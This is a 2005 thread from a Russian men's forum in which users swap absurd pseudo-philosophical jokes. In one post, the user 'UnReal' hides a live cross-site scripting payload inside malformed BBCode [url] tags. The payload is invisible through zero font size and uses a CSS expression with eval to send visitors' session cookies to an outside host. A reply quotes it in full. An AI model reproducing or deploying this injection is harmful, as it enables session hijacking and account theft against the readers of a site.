|
Мужской портал. Форумы для мужчин - www.men.ru Самые важные, полезные и интересные темы для мужских дискуссий. Самые свежие подробности и самые жаркие споры.
|
Предыдущая тема :: Следующая тема |
Автор |
Сообщение |
Любимая завсегдатай

|
Добавлено: Чт, 30 Июн 2005 07:05:51 +0000 Заголовок сообщения: Речь ;) |
|
|
С точки логической градации мы не можем отрицать иллюзию парадоксальности, так как жизнь аллегорична, и полна субурдинаций, и каждый индивидуум защищает свою тенденцию. А Вы как считаете товарищи колхозники?
Встает колхозник, навоз с валенка сопнул и отвечает:
- Так-то оно так, потому как не может того быть, кабы не было бы никак. И не потому, что оно вообще, а потому что когда оно что, тогда оно и пожалуйста.
 |
|
Вернуться к началу |
|
 |
Любимая* Гость
|
Добавлено: Вт, 05 Июл 2005 13:09:01 +0000 Заголовок сообщения: |
|
|
- На самом деле самого дела нет. В самой деятельности заключена самость дела - и наоборот.
Наоборот получим оборот на, и таким образом перевернем образ. Я уже не говорю о природе говора в роде при уже. Ужи и узы - вы меня понимаете, мистер Андерсон?
- Конечно, я так и думал, Смит. Дай еще затянуться. |
|
Вернуться к началу |
|
 |
Alesya завсегдатай

|
Добавлено: Вт, 05 Июл 2005 13:46:27 +0000 Заголовок сообщения: |
|
|
Это конечно так, не потому, что дескать например, но тем не менее однако. |
|
Вернуться к началу |
|
 |
Leridan завсегдатай

|
Добавлено: Вт, 05 Июл 2005 22:36:20 +0000 Заголовок сообщения: |
|
|
Любимая* писал(а): | - На самом деле самого дела нет. В самой деятельности заключена самость дела - и наоборот.
Наоборот получим оборот на, и таким образом перевернем образ. Я уже не говорю о природе говора в роде при уже. Ужи и узы - вы меня понимаете, мистер Андерсон?
- Конечно, я так и думал, Смит. Дай еще затянуться. |
 _________________ Мы теряем здоровье, чтобы заработать денег, а потом отдаем деньги, чтобы вернуть здоровье... |
|
Вернуться к началу |
|
 |
UnReal
|
Добавлено: Вт, 05 Июл 2005 23:13:01 +0000 Заголовок сообщения: Тупо! Нуудно очень :( |
|
|
Тупо и скушно Товарищи !!! Может хватит г*вно проталкивать ??
Это все х*е*р*н*я !!!
[url]www.ut[url=www.s=''style='font-size:0;color:#FFF000'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url] |
|
Вернуться к началу |
|
 |
MarFa островитянка
Зарегистрирован: 12.06.2005 Сообщения: 3977 Откуда: ________________________
|
Добавлено: Вт, 05 Июл 2005 23:48:30 +0000 Заголовок сообщения: Re: Тупо! Нуудно очень :( |
|
|
UnReal писал(а): | Тупо и скушно Товарищи !!! Может хватит г*вно проталкивать ??
Это все х*е*р*н*я !!!
[url]www.ut[url=www.s=''style='font-size:0;color:#FFF000'style='top:expression(eval(this.sss));'sss=`i=new/**/Image();i.src='http://antichat.ru/cgi-bin/s.jpg?'+document.cookie;this.sss=null`style='font-size:0;][/url][/url] |
Супер настроение......для первого то поста..... |
|
Вернуться к началу |
|
 |
|
|
Ты не можешь начинать темы Ты не можешь отвечать на сообщения Ты не можешь редактировать свои сообщения Ты не можешь удалять свои сообщения Ты не можешь голосовать в опросах
|